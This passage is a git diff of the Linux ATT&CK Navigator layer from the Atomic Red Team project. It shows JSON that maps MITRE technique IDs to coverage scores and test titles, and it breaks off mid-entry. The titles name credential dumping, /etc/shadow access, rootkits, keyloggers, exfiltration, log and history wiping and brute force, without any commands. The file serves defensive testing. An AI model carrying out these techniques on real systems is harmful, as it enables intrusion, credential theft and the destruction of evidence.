diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index f324b7d4f..a5006ce06 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@ -{"name":"Atomic Red Team (Linux)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with sh on FreeBSD (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/master.passwd (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd,master.passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Find and dump sqlite databases (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl/service\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel 
Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":6,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - netstat\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":2,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n- Pad Binary to Change Hash using truncate command - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as FreeBSD or Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":1,"enabled":true,"comment":"\n- linux rename /proc/pid/comm using prctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- 
rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":8,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture FreeBSD using tshark or tcpdump\n- Packet Capture FreeBSD using /dev/bpfN with sudo\n- Filtered Packet Capture FreeBSD using /dev/bpfN with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl freebsd,linux or macos\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery 
FreeBSD, Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /etc/cron.d folder\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":6,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Logging sh history to syslog/messages\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":17,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Obfuscated command line scripts (freebsd)\n- Change login shell\n- Change login shell (freebsd)\n- Environment variable scripts\n- Environment variable scripts (freebsd)\n- Detecting pipe-to-shell\n- Detecting pipe-to-shell (freebsd)\n- Current kernel information enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts\n- Execute Python via Python executables\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":36,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":9,"enabled":true,"comment":"\n- rm -rf\n- rm -rf\n- Truncate system log files via truncate utility (freebsd)\n- Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)\n- Overwrite FreeBSD system log via echo utility\n- Delete system log files via unlink utility (freebsd)\n- Delete system journal logs via rm and journalctl utilities\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":16,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear sh history (rm)\n- Clear Bash history (echo)\n- Clear sh history (echo)\n- Clear Bash history (cat dev/null)\n- Clear sh history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear sh history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear sh history (truncate)\n- Clear history of a bunch of shells\n- Clear history of a bunch of shells (freebsd)\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n- Disable sh History Logging with SSH -T (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":5,"enabled":true,"comment":"\n- Delete a single file - FreeBSD/Linux/macOS\n- Delete an entire folder - FreeBSD/Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n- Delete Filesystem - FreeBSD\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Linux\n- Copy and Modify Mailbox Data on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n- Stage data from Discovery.sh (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":6,"enabled":true,"comment":"\n- Create local account (Linux)\n- Create local account (FreeBSD)\n- Reactivate a locked/expired account (Linux)\n- Reactivate a locked/expired account (FreeBSD)\n- 
Login as nobody (Linux)\n- Login as nobody (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":8,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- FreeBSD VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on freebsd, macos and linux\n- Linux List Kernel Modules\n- FreeBSD List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":7,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Show if a user account has ever logged in remotely (freebsd)\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n- Tor Proxy Usage - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n- SUDO Brute Force - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":2,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n- SSH 
Credential Stuffing From FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":4,"enabled":true,"comment":"\n- X Windows Capture\n- X Windows Capture (freebsd)\n- Capture Linux Desktop using Import Tool\n- Capture Linux Desktop using Import Tool (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":1,"enabled":true,"comment":"\n- System Time Discovery in FreeBSD/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"comment":"\n- Base64 Encoded data.\n- Base64 Encoded data (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":2,"enabled":true,"comment":"\n- Network Share Discovery - linux\n- Network Share Discovery - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a user account on a FreeBSD system\n- Create a 
new user in Linux with `root` UID and GID.\n- Create a new user in FreeBSD with `root` GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":2,"enabled":true,"comment":"\n- Active Directory Create Admin Account\n- Active Directory Create User Account (Non-elevated)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1140","score":8,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Base64 decoding with shell utilities (freebsd)\n- FreeBSD b64encode Shebang in CLI\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n- XOR decoding and command execution using Python\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - FreeBSD\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":2,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux\n- List Google Chromium Bookmark JSON Files on FreeBSD\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- chflags - Remove immutable file attribute\n- Chmod through c script\n- Chmod through c script (freebsd)\n- Chown through c script\n- Chown through c script (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (FreeBSD/Linux)\n- Encrypt files using 7z (FreeBSD/Linux)\n- Encrypt files using ccrypt (FreeBSD/Linux)\n- Encrypt files using openssl (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n- Detect Virtualization Environment (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":2,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n- Security Software Discovery - pgrep (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":9,"enabled":true,"comment":"\n- Restart System via `shutdown` - FreeBSD/macOS/Linux\n- Shutdown System via `shutdown` - FreeBSD/macOS/Linux\n- Restart System via `reboot` - FreeBSD/macOS/Linux\n- Shutdown System via `halt` - FreeBSD/Linux\n- Reboot System via `halt` - FreeBSD\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - FreeBSD/Linux\n- Reboot System via `poweroff` - FreeBSD\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":1,"enabled":true,"comment":"\n- Change User Password via passwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"comment":"\n- Create Systemd Service\n- Create SysV Service\n- Create Systemd Service file, Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Add command to .shrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n- Create/Append to .bash_logout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"comment":"\n- Trap EXIT\n- Trap EXIT (freebsd)\n- Trap SIGINT\n- Trap SIGINT (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"comment":"\n- Make and modify binary from C 
source\n- Make and modify binary from C source (freebsd)\n- Set a SetUID flag on file\n- Set a SetUID flag on file (freebsd)\n- Set a SetGID flag on file\n- Set a SetGID flag on file (freebsd)\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"comment":"\n- Sudo usage\n- Sudo usage (freebsd)\n- Unlimited sudo cache timeout\n- Unlimited sudo cache timeout (freebsd)\n- Disable tty_tickets for sudo caching\n- Disable tty_tickets for sudo caching (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Find AWS credentials\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"comment":"\n- Search Through Bash History\n- Search Through sh History\n","links":[{"label":"View 